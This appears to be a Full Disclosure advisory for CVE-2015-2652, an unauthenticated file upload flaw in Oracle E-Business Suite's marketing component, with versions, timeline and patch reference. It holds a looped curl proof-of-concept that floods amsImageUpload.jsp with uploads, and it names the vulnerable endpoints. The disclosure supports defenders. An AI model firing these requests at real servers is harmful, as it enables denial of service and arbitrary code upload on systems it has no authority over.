CVE-2015-2652 – Unauthenticated File Upload in Oracle E-business Suite.

[Sandeep Kamble <sandeep () securelayer7 net>]

*Introduction*

*Oracle E*–*Business Suite* is a fully integrated, comprehensive suite of
business applications for the enterprise. Following purposes most of
organization uses Oracle E-business.

   1. Customer Relationship Management
   2. Financial Management
   3. Human Capital Management
   4. Project Portfolio Management
   5. Advanced Procurement
   6. Supply Chain Management
   7. Service Management

*Vulnerable Version*

Oracle E-Business Suite, version(s) 11.5.10.2, 12.0.6, 12.1.1, 12.1.2,
12.1.3, 12.2.3, 12.2.4

*Brief About bug *

The unauthenticated upload vulnerability resides in Oracle Marketing
component.  If you search in Google for Oracle E-business, you will find
more than 30K unique search results.

The file is uploaded into a table in the E-Business Suite database schema.
The attacker,however, can use it to fill up the existing table space.
Upload functionality allows the attacker to upload any arbitrary file
types(All executables) and also allows to execute the uploaded code.
​

*POC Raw code for feeding files files to server to :*

for ($x=1; $x < 100; $x++):
curl -i -s -k  -X 'POST' \
    -H 'Origin: http://Oracle-Application:Port&apos; -H 'User-Agent:
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/43.0.2357.65 Safari/537.36' -H 'Content-Type:
multipart/form-data; boundary=----WebKitFormBoundarywS9xiTn7rP23Fori'
-H 'Referer: http://Oracle-Application:Port/OA_HTML/amsImageSelect.jsp&apos;
\
    -b 'JSESSIONID=6e66b3f234234234272c18909d2bca0c96bf7c.kdsnfksjdfn34rk32;
PROD_pses=PROD%3DHcqumhXKzuUX0xNEIjoeFKu8hZ%7E;
PROD=HcqumhXKzuUX0xNEIjoeFKu8hZ; oracle.uix=0^^GMT+4:00^p' \
    --data-binary
$'------WebKitFormBoundarywS9xiTn7rP23Fori\x0d\x0aContent-Disposition:
form-data; name=\"type\"\x0d\x0a\x0d\x0aF\x0d\x0a------WebKitFormBoundarywS9xiTn7rP23Fori\x0d\x0aContent-Disposition:
form-data; name=\"FileInput\";
filename=\"Check.txt\"\x0d\x0aContent-Type:
text/plain\x0d\x0a\x0d\x0a\x0d\x0a------WebKitFormBoundarywS9xiTn7rP23Fori\x0d\x0aContent-Disposition:
form-data; 
name=\"fileId\"\x0d\x0a\x0d\x0anull\x0d\x0a------WebKitFormBoundarywS9xiTn7rP23Fori\x0d\x0aContent-Disposition:
form-data; name=\"url\"\x0d\x0a\x0d\x0a\x0d\x0a------WebKitFormBoundarywS9xiTn7rP23Fori--\x0d\x0a'
\
    
'http://Oracle-Application:Port//OA_HTML/amsImageUpload.jsp?dummy=1&jttst0=6_22646%2C22646%2C-1%2C0%2C&jtfm0=&etfm1=&jfn=ZG01DFBB7BC079CDE282F4716CF2E5B140454CA599F18AD7A2CAD711D30D5FB60DF18438A1D10EB7BD7CF1370CF9D979BDA7&oas=ddrqZePQ82zVbJrUIG7jrw..&JSSetFunctionName=null&elemName=null&apos;
end for;

​

*Vulnerability Information *

By using the following URLs the attacker can use it to upload files on the
server.

http://ORACLE-WebServer:Port/OA_HTML/amsImageSelect.jsp
http://ORACLE-WebServer:Port/OA_HTML/amsImageUpload.jsp

*Timeline*


May 7, 2015 :  Identification of the vulnerability
May 8, 2015 :  Reported to the Oracle Security Team

May 12, 2015: Confirmed Upload Vulnerability in Oracle E-business
May 22, 2015 :Upload Vulnerability Patched
May 22, 2015 : CPU Scheduled for Critical Update
July 13, 2015 : CVE Allocated CVE-2015-2652
July 14, 2015 : Critical Update Pushed
July 15, 2015 : Vulnerability Made Public

*Mitigation*

Update Oracle E-business Suit to latest version.

Oracle vulnerability reference and vulnerability credit: Oracle Critical
Patch Update Advisory – July 2015
<http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html>
​
Reference :
http://blog.securelayer7.net/cve-2015-2652-unauthenticated-file-upload-in-oracle-e-business-suite/​


-- 
​Sandeep
http://securelayer7.net​

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/